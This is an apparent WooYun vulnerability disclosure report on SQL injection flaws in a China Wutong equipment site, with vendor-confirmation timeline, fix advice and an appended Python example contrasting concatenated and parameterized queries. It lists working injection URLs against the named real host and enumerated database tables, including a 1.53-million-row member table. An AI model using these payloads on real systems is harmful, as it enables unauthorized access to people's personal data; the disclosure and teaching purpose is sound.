
Vulnerability summary

Defect ID: wooyun-2015-0142438

Title: Multiple SQL injections on a China Wutong (中国物通网) site (1.53 million member records exposed)

Vendor: China Wutong (中国物通网)

Author: 路人甲

Submitted: 2015-09-21 15:13

Fixed: 2015-11-09 08:38

Published: 2015-11-09 08:38

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-21: Details sent to the vendor; awaiting vendor response
2015-09-25: Vendor confirmed; details visible to the vendor only
2015-10-05: Details opened to core white hats and domain experts
2015-10-15: Details opened to regular white hats
2015-10-25: Details opened to intern white hats
2015-11-09: Details opened to the public

Summary:

Several injection points; submitted together as one report.

Details:

Injection points:
http://shebei.chinawutong.com/115.html?key=1' and 1=user -- -
http://shebei.chinawutong.com/116.html?key=1' and 1=user and '%'='
http://shebei.chinawutong.com/117.html?key=1' or 1=user and '%'='
http://shebei.chinawutong.com/115.html?p=1&fn=1' or 1=user and '%'='
http://shebei.chinawutong.com/115.html?p=1&fn=df&cn=1' and 1=user and '%'='

[Screenshot 1.png]


Database: Wutong
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.huoOld | 11178014 |
| dbo.syncobj_0x4633453042374444 | 6738156 |
| dbo.wshiMainline | 6738156 |
| dbo.syncobj_0x3439373531363345 | 1869411 |
| dbo.huiyuan | 1530707 |
| dbo.syncobj_0x4434363133443337 | 1530707 |
| dbo.ClickLog | 1528748 |
| dbo.huo | 1391652 |
| dbo.syncobj_0x3637443233313437 | 1391652 |
| dbo.syncobj_0x3531423844353443 | 1278404 |
| dbo.qiyepic | 1086054 |
| dbo.wshiMainline_Price | 862280 |
| dbo.qiye | 853886 |
| dbo.syncobj_0x3934324143354645 | 853886 |
| dbo.qiyeView | 853876 |
| dbo.push_Themes | 811198 |
| dbo.syncobj_0x3739364335463539 | 646082 |
| dbo.tb_SupplyInfor | 516983 |
| dbo.push_CustomerTempThemes | 512819 |
| dbo.CarLineUrl | 443147 |
| dbo.message | 257104 |
| dbo.syncobj_0x3032423438383034 | 257104 |
| dbo.syncobj_0x3846423930423839 | 207100 |
| dbo.wsheng | 165348 |
| dbo.zhaoshang | 84438 |
| dbo.push_autoPublish | 68067 |
| dbo.huo_order | 64417 |
| dbo.syncobj_0x4438333843394444 | 58612 |
| dbo.wshi | 58612 |
| dbo.ygrizhi | 57785 |
| dbo.syncobj_0x3846364531304330 | 46862 |
| dbo.kshi | 44881 |
| dbo.push_CustomerTopic | 37345 |
| dbo.syncobj_0x3938453936374632 | 18354 |
| dbo.ksheng | 13025 |
| dbo.kuaijian | 11837 |
| dbo.CoPicture | 11073 |
| dbo.jianli | 8591 |
| dbo.DiaoCha | 5875 |
| dbo.wxt_dd | 5718 |
| dbo.AIRPORT | 4915 |
| dbo.push_roborder | 4022 |
| dbo.CustLocation | 4011 |
| dbo.jiameng_order | 3969 |
| dbo.infomationAppraise | 3454 |
| dbo.Appraise | 2872 |
| dbo.renzheng_geren | 2574 |
| dbo.CustLink | 2114 |
| dbo.tb_BuyInfor | 1992 |
| dbo.wshiLinShi | 1953 |
| dbo.renzheng_qiye | 1886 |
| dbo.EmailTriggerRecord | 1855 |
| dbo.tem_userset | 1852 |
| dbo.link | 1512 |
| dbo.Cert_Car | 1338 |
| dbo.ChengYunOrder | 1258 |
| dbo.wshiOrder | 1212 |
| dbo.CW_Device | 725 |
| dbo.syncobj_0x3630373132373946 | 542 |
| dbo.view_Prize | 530 |
| dbo.sysarticlecolumns | 441 |
| dbo.BlackList | 433 |
| dbo.syssubscriptions | 417 |
| dbo.Emails | 295 |
| dbo.DomainList | 245 |
| dbo.tb_TwoLeve | 178 |
| dbo.sysextendedarticlesview | 139 |
| dbo.CARRIER | 137 |
| dbo.sysschemaarticles | 126 |
| dbo.news | 70 |
| dbo.gpsUserInfo | 60 |
| dbo.Collect_Car | 52 |
| dbo.yuangong | 48 |
| dbo.GY_CharityCom | 37 |
| dbo.jop | 24 |
| dbo.tb_OneLeve | 20 |
| dbo.sysarticles | 13 |
| dbo.zhengshu | 11 |
| dbo.huodong_order | 10 |
| dbo.huo_print | 8 |
| dbo.tc_car | 7 |
| dbo.keshi | 5 |
| dbo.Admin | 4 |
| dbo.powerUnit | 4 |
| dbo.userPower | 4 |
| dbo.yanzheng_jiashi | 4 |
| dbo.rolePower | 3 |
| dbo.wshiMainlineLinShi | 2 |
| dbo.yanzheng_xingshi | 2 |
| dbo.syspublications | 1 |
| dbo.sysreplservers | 1 |
+--------------------------------+---------+


The huiyuan table holds 1.53 million rows and can be dumped.

[Screenshot 2.png]


[Screenshot 3.png]


Proof of vulnerability:

[Screenshot 2.png]

Fix recommendation:

Filter the input.
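The fix section above says only "filter". The block below is an added example, not code from the report or from the vendor's site: it places the string-concatenated LIKE query that produces this class of bug next to its parameterized replacement, using Python's sqlite3 so it runs offline. The table name huiyuan comes from the report; the column names and sample rows are constructed. The payload follows the shape of the report's URLs (close the quoted pattern, add a condition, re-open it with `'%'='`), with a plain `1=1` in place of the SQL Server-specific `1=user` comparison, since sqlite has no `user` function.

```python
import sqlite3

# Constructed sample rows standing in for a members table. The report's table
# is dbo.huiyuan on SQL Server; the columns here are assumptions for the demo.
SAMPLE_MEMBERS = [
    (1, "alice"),
    (2, "bob"),
    (3, "carol"),
]

# Same shape as the report's payloads: the leading quote closes the LIKE
# pattern, an always-true condition follows, and '%'=' re-opens a quoted
# string so that the trailing %' of the original pattern still parses.
TAUTOLOGY_KEY = "1' or 1=1 and '%'='"


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE huiyuan (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO huiyuan VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def search_vulnerable(conn, key):
    """Builds the LIKE pattern by string concatenation.

    The user-supplied key becomes part of the SQL text, so a quote inside it
    changes the statement's structure instead of being matched literally.
    """
    sql = "SELECT id, name FROM huiyuan WHERE name LIKE '%" + key + "%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, key):
    """Binds the key as a query parameter.

    The statement text is fixed; the driver passes the key as a value, so
    quotes and keywords in it can only ever be compared against the column.
    """
    sql = "SELECT id, name FROM huiyuan WHERE name LIKE ?"
    return conn.execute(sql, ("%" + key + "%",)).fetchall()


def compare(key):
    """Return (rows from the vulnerable query, rows from the safe query)."""
    conn = make_db()
    try:
        return search_vulnerable(conn, key), search_parameterized(conn, key)
    finally:
        conn.close()


if __name__ == "__main__":
    bad, good = compare(TAUTOLOGY_KEY)
    print("vulnerable query returned", len(bad), "rows")      # all 3 rows
    print("parameterized query returned", len(good), "rows")  # 0 rows
```

With the tautology key the concatenated query returns every member row, which is the mechanism behind a table of this size being dumpable; the parameterized query treats the same key as a literal pattern and returns nothing. Input filtering, as the report recommends, can sit in front of this as defense in depth, but binding parameters is what removes the injection itself.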

Copyright notice: please credit 路人甲@乌云 when reposting.


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-09-25 08:36

Vendor reply:

Thanks for your support. Thank you.

Latest status:

None